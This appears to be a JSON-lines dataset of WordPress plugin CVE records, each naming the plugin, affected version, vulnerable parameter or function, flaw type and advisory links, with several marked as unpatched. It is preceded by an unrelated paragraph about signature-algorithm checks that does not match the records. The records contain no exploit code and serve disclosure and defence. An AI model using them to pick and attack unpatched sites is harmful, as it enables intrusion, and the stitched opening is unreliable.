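The fix the record points to is the same in any language: the algorithm is a server-side constant, never a request field, and the comparison is a constant-time string compare rather than ==. Checking is_string() on the supplied signature before hash_equals() is also worth doing on untyped code paths, since hash_equals() refuses non-string arguments.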
{"CVE_ID":"CVE-2023-2229","slug":"rduplicator","versionImpact":"2.0","description":"The Quick Post Duplicator plugin for WordPress is vulnerable to SQL Injection via the \u2018post_id\u2019 parameter in versions up to, and including, 2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers with contributor-level privileges to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34e31a0f-27de-4536-9a7e-b8f68e557b3f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34e31a0f-27de-4536-9a7e-b8f68e557b3f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rduplicator\\\/trunk\\\/quick-post-duplicator.php?rev=2844890\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rduplicator\\\/trunk\\\/quick-post-duplicator.php?rev=2844890\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5205","slug":"add-custom-body-class","versionImpact":"1.4.1","description":"The Add Custom Body Class plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'add_custom_body_class' value in versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9841b57b-b869-4282-8781-60538f6f269f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9841b57b-b869-4282-8781-60538f6f269f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-custom-body-class\\\/trunk\\\/add-custom-body-class.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-custom-body-class\\\/trunk\\\/add-custom-body-class.php#L32\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-37890","slug":"kb-support","versionImpact":"1.5.88","description":"Missing Authorization vulnerability in WPOmnia KB Support \u2013 WordPress Help Desk and Knowledge Base allows Accessing Functionality Not Properly Constrained by ACLs. Users with a role as low as a subscriber can view other customers. This issue affects KB Support \u2013 WordPress Help Desk and Knowledge Base: from n\/a through 1.5.88.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/kb-support\\\/wordpress-kb-support-wordpress-help-desk-plugin-1-5-88-sensitive-data-exposure-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/kb-support\\\/wordpress-kb-support-wordpress-help-desk-plugin-1-5-88-sensitive-data-exposure-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-24712","slug":"heateor-social-login","versionImpact":"1.1.30","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Team Heateor Heateor Social Login WordPress allows Stored XSS. This issue affects Heateor Social Login WordPress: from n\/a through 1.1.30.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/heateor-social-login\\\/wordpress-heateor-social-login-plugin-1-1-30-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/heateor-social-login\\\/wordpress-heateor-social-login-plugin-1-1-30-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2089","slug":"remote-content-shortcode","versionImpact":"1.5","description":"The Remote Content Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'remote_content' shortcode in all versions up to, and including, 1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66abfe6b-c706-4e70-b35b-ee04da613933?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66abfe6b-c706-4e70-b35b-ee04da613933?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/remote-content-shortcode\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/remote-content-shortcode\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4270","slug":"svgmagic","versionImpact":"1.1","description":"The SVGMagic WordPress plugin through 1.1 does not sanitize SVG file contents, which enables users with at least the author role to upload SVG files with malicious JavaScript to conduct Stored XSS attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a3b89cc-7a81-448a-94fc-36a7033609d5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a3b89cc-7a81-448a-94fc-36a7033609d5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5704","slug":"faq-for-woocommerce","versionImpact":"1.6.4","description":"The XPlainer \u2013 WooCommerce Product FAQ [WooCommerce Accordion FAQ Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 1.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to add new and update existing FAQs, FAQ lists, and modify FAQ associations with products.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d3e476d-0885-4e8c-a682-bd64d9f13b53?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d3e476d-0885-4e8c-a682-bd64d9f13b53?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/faq-woocommerce-admin-functions.php#L100\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/faq-woocommerce-admin-functions.php#L100\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/faq-woocommerce-admin-functions.php#L216\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/faq-woocommerce-admin-functions.php#L216\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/faq-woocommerce-admin-functions.php#L269\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/faq-woocommerce-admin-functions.php#L269\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/faq-woocommerce-admin-functions.php#L326\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/faq-woocommerce-admin-functions.php#L326\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/faq-woocommerce-admin-functions.php#L385\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/faq-woocommerce-admin-functions.php#L385\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2541","slug":"popup-builder","versionImpact":"4.3.3","description":"The Popup Builder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.3 via the Subscribers Import feature. This makes it possible for unauthenticated attackers to extract sensitive data after an administrator has imported subscribers via a CSV file. This data may include the first name, last name, e-mail address, and potentially other personally identifiable information of subscribers.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/086cd6a0-adb6-4e12-b34c-630297f036f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/086cd6a0-adb6-4e12-b34c-630297f036f3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/popup-builder\\\/trunk\\\/com\\\/libs\\\/Importer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/popup-builder\\\/trunk\\\/com\\\/libs\\\/Importer.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37218","slug":"page-builder-sandwich","versionImpact":"5.1.0","description":"Missing Authorization vulnerability in WordPress Page Builder Sandwich Team Page Builder Sandwich \u2013 Front-End Page Builder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Page Builder Sandwich \u2013 Front-End Page Builder: from n\/a through 5.1.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/page-builder-sandwich\\\/wordpress-page-builder-sandwich-5-1-0-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/page-builder-sandwich\\\/wordpress-page-builder-sandwich-5-1-0-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11323","slug":"ai-quiz","versionImpact":"1.1","description":"The AI Quiz | Quiz Maker plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the ai_quiz_update_style() function in all versions up to, and including, 1.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-quiz\\\/tags\\\/1.1\\\/functions.php#L688\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-quiz\\\/tags\\\/1.1\\\/functions.php#L688\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53591a3b-8a99-40e2-8145-1d7785bcbab4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53591a3b-8a99-40e2-8145-1d7785bcbab4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10322","slug":"brizy","versionImpact":"2.6.8","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 2.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231744\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231744\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231744\\\/brizy\\\/trunk\\\/admin\\\/svg\\\/main.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231744\\\/brizy\\\/trunk\\\/admin\\\/svg\\\/main.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/brizy\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/brizy\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b2ef7c3-4610-4e8b-ab27-2d6cbdbed097?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b2ef7c3-4610-4e8b-ab27-2d6cbdbed097?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2483","slug":"gift-certificate-creator","versionImpact":"1.1.0","description":"The Gift Certificate Creator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018receip_address\u2019 parameter in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-certificate-creator\\\/trunk\\\/giftcertificates.php#L312\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-certificate-creator\\\/trunk\\\/giftcertificates.php#L312\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gift-certificate-creator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gift-certificate-creator\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/adbebe61-3adc-4ba1-8767-863dc2310cad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/adbebe61-3adc-4ba1-8767-863dc2310cad?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5930","slug":"wp2html","versionImpact":"1.0.2","description":"The WP2HTML plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.2. This is due to missing or incorrect nonce validation on the save() function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2html\\\/trunk\\\/classes\\\/admin.class.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2html\\\/trunk\\\/classes\\\/admin.class.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2html\\\/trunk\\\/classes\\\/main.class.php#L18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2html\\\/trunk\\\/classes\\\/main.class.php#L18\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac34e369-de9e-4b13-8858-0b4300aef5f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac34e369-de9e-4b13-8858-0b4300aef5f8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8720","slug":"wp-readme-parser","versionImpact":"1.3.15","description":"The Plugin README Parser plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018target\u2019 parameter in all versions up to, and including, 1.3.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-readme-parser\\\/tags\\\/1.3.15\\\/includes\\\/generate-output.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-readme-parser\\\/tags\\\/1.3.15\\\/includes\\\/generate-output.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-readme-parser\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-readme-parser\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aad6151a-6897-4d0c-9dfb-0f424c683111?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aad6151a-6897-4d0c-9dfb-0f424c683111?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1024","slug":"wp-meta-seo","versionImpact":"4.5.3","description":"The WP Meta SEO plugin for WordPress is vulnerable to unauthorized sitemap generation due to a missing capability check on the regenerateSitemaps function in versions up to, and including, 4.5.3. This makes it possible for authenticated attackers with subscriber-level access to generate sitemaps. This vulnerability occurred as a result of the plugin relying on nonce checks as a means of access control, and that nonce being accessible to all authenticated users regardless of role.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a3f835e-0aa9-4581-9150-fe5041e0f293\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a3f835e-0aa9-4581-9150-fe5041e0f293\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2870465%40wp-meta-seo&new=2870465%40wp-meta-seo&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2870465%40wp-meta-seo&new=2870465%40wp-meta-seo&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2188","slug":"colibri-page-builder","versionImpact":"1.0.227","description":"The Colibri Page Builder for WordPress is vulnerable to SQL Injection via the \u2018post_id\u2019 parameter in versions up to, and including, 1.0.227 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers with administrator-level privileges to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/utils.php#L556\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/utils.php#L556\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c73d4b78-72aa-409a-a787-898179773b82?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c73d4b78-72aa-409a-a787-898179773b82?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2922722\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2922722\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6941","slug":"infusionsoft-official-opt-in-forms","versionImpact":"1.0.11","description":"The Keap Official Opt-in Forms WordPress plugin through 1.0.11 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58f7c9aa-5e59-468f-aba9-b15e7942fd37\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58f7c9aa-5e59-468f-aba9-b15e7942fd37\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4729","slug":"ladipage","versionImpact":"4.4","description":"The LadiApp plugin for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce check on the publish_lp() function hooked via an AJAX action in versions up to, and including, 4.4. This makes it possible for unauthenticated attackers to change the LadiPage key (a key fully controlled by the attacker), enabling them to freely create new pages, including web pages that trigger stored XSS via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db707507-c53f-45b8-a8e1-7fea1c6f8f3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db707507-c53f-45b8-a8e1-7fea1c6f8f3c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L1992\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L1992\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4005","slug":"social-pixel","versionImpact":"2.1","description":"The Social Pixel WordPress plugin through 2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/02ca09f8-4080-4969-992d-0e6afb29bc62\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/02ca09f8-4080-4969-992d-0e6afb29bc62\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5669","slug":"faq-for-woocommerce","versionImpact":"1.6.4","description":"The XPlainer \u2013 WooCommerce Product FAQ [WooCommerce Accordion FAQ Plugin] plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ffw_activate_template' function in all versions up to, and including, 1.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to store cross-site scripting that will trigger when viewing the dashboard templates or accessing FAQs.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5a404de-ee26-44af-9e4f-f93694da7a77?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5a404de-ee26-44af-9e4f-f93694da7a77?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/faq-woocommerce-admin-functions.php#L471\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/faq-woocommerce-admin-functions.php#L471\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1384","slug":"auxin-portfolio","versionImpact":"2.3.3","description":"The Premium Portfolio Features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'aux_recent_portfolios_grid' shortcode in all versions up to, and including, 2.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4475cbd4-07cf-499a-a11a-b63eb9184568?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4475cbd4-07cf-499a-a11a-b63eb9184568?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-portfolio\\\/trunk\\\/includes\\\/elements\\\/recent-portfolios.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-portfolio\\\/trunk\\\/includes\\\/elements\\\/recent-portfolios.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10367","slug":"otter-blocks","versionImpact":"3.0.4","description":"The Otter Blocks \u2013 Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d83c085-b33a-4003-9e0a-8457669d6634?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d83c085-b33a-4003-9e0a-8457669d6634?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/otter-blocks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/otter-blocks\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3178637\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3178637\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11385","slug":"pure-css-circle-progress-bar","versionImpact":"1.2","description":"The Pure CSS Circle Progress bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'circle_progress' shortcode in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pure-css-circle-progress-bar\\\/trunk\\\/pure-css-circle-progress-bar.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pure-css-circle-progress-bar\\\/trunk\\\/pure-css-circle-progress-bar.php#L19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c098c975-3a9b-4b6c-81e7-c66ca9e3d09c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c098c975-3a9b-4b6c-81e7-c66ca9e3d09c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
